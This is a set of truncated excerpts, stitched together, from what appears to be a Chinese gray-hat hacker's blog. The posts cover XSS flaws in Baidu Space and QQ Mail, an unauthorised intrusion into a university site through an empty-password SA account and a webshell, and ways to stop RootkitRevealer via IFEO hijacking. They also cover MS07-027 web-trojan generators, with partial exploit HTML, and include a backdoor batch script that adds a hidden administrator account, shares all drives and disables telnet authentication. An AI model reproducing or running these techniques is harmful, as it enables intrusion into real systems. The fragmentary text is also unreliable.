flash9的那个就闹得沸沸扬扬，朋友送了点好东西给我，我也没时间去分析。总想着什么时候把这个漏洞分析明了。很早之前就在进行了，可是……忙。现在想到毕业设计论文还没开始写，我又头疼了:.(

还有mass injection，很疯狂:)。当google爬虫被邪恶地利用时，它就变成了google黑虫了:)

现在动不动就是fuzzing~

IE print的那个鸡肋网马，除非加点社工技巧，否则根本没用。但是在code的过程中，也可以掌握点写网马的技巧，我觉得，每天跟踪网马那就很没意思了，打造自己的网马中枢，这才是王道。

JavaSc

噬菌体军团，期待的……NULL NULL NULL NULL NULL NULL NULL……

黑色的google，很不错，因为是黑色的。下面是我设计的页面，编码为gb2312，这样就避免了汉字查询时出现乱码。可以访问这：http://evilcos.googlepages.com/BlackGoogle.html或者http://www.cosblog.com/blackgoogle.html。

搜索结果页，页面上的元素颜色都是可以自定义的。代码如下，其中定义颜色等参数的用红色标出，细节就自己摸索。

下午四点剑心突然发QQ过来说，百度空间又来了个跨站。把我吓了一跳，我那时在干什么了，我好像在走神中……细节不公布，他的跨站方式和我的不一样，不过原理是一样的。

还是利用css，不过这个css不是一般思路上的css；还是expression，不过这个expression不需要任何的变形，很好，很邪恶！他这都挖掘出来了，厉害，反正这两天心情闷闷的，于是我也开始渗透。伪客户端我已经构造好了。

服务端过滤了单引号，导致常规执行远程js文件的方法就不可行了！使用

我的行为倾向于Gray Hat Hacking。深更半夜的时候收到同学的短信说教务处网站被挂马。我本对此事是睁一只眼，闭一只眼的……因为自己的处境是灰帽黑客(Gray Hat Hacker)的原因。不过还是有点忍不住了，终于开始入侵了！

也难怪教务处网站被挂马，数据库SA权限，空密码。防注入系统轻易绕过，入侵就这样一气呵成！我用我的webshell查到了其它黑客留下的后门，除了我自己的，还有四个。我判断这四个后门不应该是属于同一个黑客的。当务之急是清除挂马代码，在index.asp文件中发现代码（删掉！）：

RootkitRevealer号称检测Rootkit的一种很有效的工具。要躲避这类对付Rootkit的软件，必须拦截这类软件读取注册表配置单元数据或文件系统数据的操作，并更改这些数据的内容。这需要非常高深的技术，我不懂……不过我知道有两种方法可以防止RootkitRevealer的运行，而恶意软件要做到这两点将会非常的容易，不过也许会给自身带来点麻烦……

一、IFEO映像劫持：

在注册表这个位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executio

5月16号微软更新了Internet Explorer的这个漏洞补丁。好像这个漏洞并不流行，不过网上已经MS07027漏洞利用的工具了，我所了解的有两款：MS07027网马生成器与最新MS07027+免杀ANI超强高效率网马生成器。

一、MS07027网马生成器会生成一个MS07027.html文件，内容如下：

<html>
<title> MS07-027 Oday </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa00

@echo off
@attrib +r +s system.bat
@net user Guests 000 /add
@net localgroup administrators Guests /add
@sc config lanmanserver start= auto
@net start server
@net share C$=C:
@net share D$=D:
@net share E$=E:
@net share F$=F:
@net share G$=G:
@net share H$=H:
@net share I$=I:
@net share J$=J:
@net share K$=K:
@tlntadmn config sec = -ntlm
rem 设定身份验证机构：不认证

@sc config Schedule start= auto
@net stop "Task

Flash的fscommand这个函数可以执行任意文件，你想到了什么？我觉得现在的重点应该稍微转移到Flash在“恶意行为”的角色上了！一个月前我提起过flash与asp的通信问题。我在这方面也是刚开始深入，并且断断续续的，没什么值得高兴的进展！

Flash与JavaScript的通信问题也许会更加吸引人吧？估计反病毒的朋友一看到JavaScript就想到了挂马了^^。Flash自己的ActionScript脚本语言不是孤独的，它可以与其它语言进行通信

一个月前发现QQ邮箱漏洞：JavaScript跨站攻击与后来发布了QQ邮箱最新漏洞与微软ANI漏洞的利用！今天又发现了最新跨站利用方式！之前发现的漏洞现在都无效了，网上公布的一些QQ邮箱跨站漏洞经过测试也无效。现在公布此漏洞。要是有能力者可以去利用？测